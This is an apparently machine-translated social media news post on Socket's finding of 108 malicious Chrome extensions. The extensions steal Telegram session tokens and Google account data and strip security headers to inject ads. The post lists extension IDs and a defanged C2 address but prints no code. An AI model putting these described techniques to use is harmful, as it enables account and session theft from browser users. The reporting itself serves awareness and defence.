Data theft malware found on 108 other Chrome add-ons

Data theft malware was detected on 108 other Chrome add-ons, hitting over 20,000 victims.

Web browser add-ons or extensions can help web browsers to perform a variety of tasks, creating ease for users, but many fake malware add-ons have now been detected that can cause users, rather than ease, to suffer.

According to a report by the website, The Hacker News has mentioned the detection of up to 108 fake Chrome web browser add-ons that all behave in the same way: they are connected to the same C2 or Command and Control command infrastructure. They will contact the C2 server located at 144.126.135. [.] 238. These add-ons have the same purpose: they are used to steal Credential, User Identity, and Website Visiting Information. Even worse, 56 of the 108 add-ons are capable of stealing Google accounts through OAuth2, 45 of them have the ability to be a backdoor for hackers to use in the following activities:

Exfiltration of Telegram chat application every 15 seconds

Remove critical headers of WFP and Youtube such as Content Security Policy, X-Frame-Options, and CORS and shoot the Injection code to display online gambling website ads instead.

Shoot the script to display the content required by the hackers on every website the victim accesses.

Redirect (Proxy) Translation Request to Hacker's Server

According to a research team from Socket, a cybersecurity specialist, the 108 add-ons come from just five publishers including Yana Project, GameGen, SideGames, Rodeo Games and InterAlt. With a total of over 20,000 add-ons installed today, examples of dangerous add-ons are as follows:

Telegram Multi-Account (ID: obifanppcpchlehkjipahhphbcbjekfa) An add-on that claims to enable multiple Telegram accounts at the same time, but actually secretly steals the user _ auth's Token, which is used to authenticate users' identities on the Telegram Web, sent back to hackers, as well as can overwrite localStorage with Session data. Use sent by hackers to turn the victim's Session into the Session required by hackers instead.

Web Client for Telegram - Teleside (ID: mdcfennpfgkngnibjbpnpaafcjnhcjno) has the ability to remove Telegram's Header and then shoot the script for stealing the victim's account.

Formula Rush Racing Game (ID: akebbllmckjphjiojeioooidhnddnplj) is used to steal Google accounts through tricking them into pressing the Sign-In button. The stolen data consists of emails, profile photos, full names, and Google account numbers.

The source does not indicate whether Google has removed these dangerous add-ons from the Web Store or not yet. It is not yet possible to determine who is behind this outrageous incident, but there is an assumption that hackers from Russia may be behind it because of the large number of Russian language inserts in the add-ons' code.

# Trending # Lemon 8 Howtoo # lemon 8 diary # chrome # freedomhack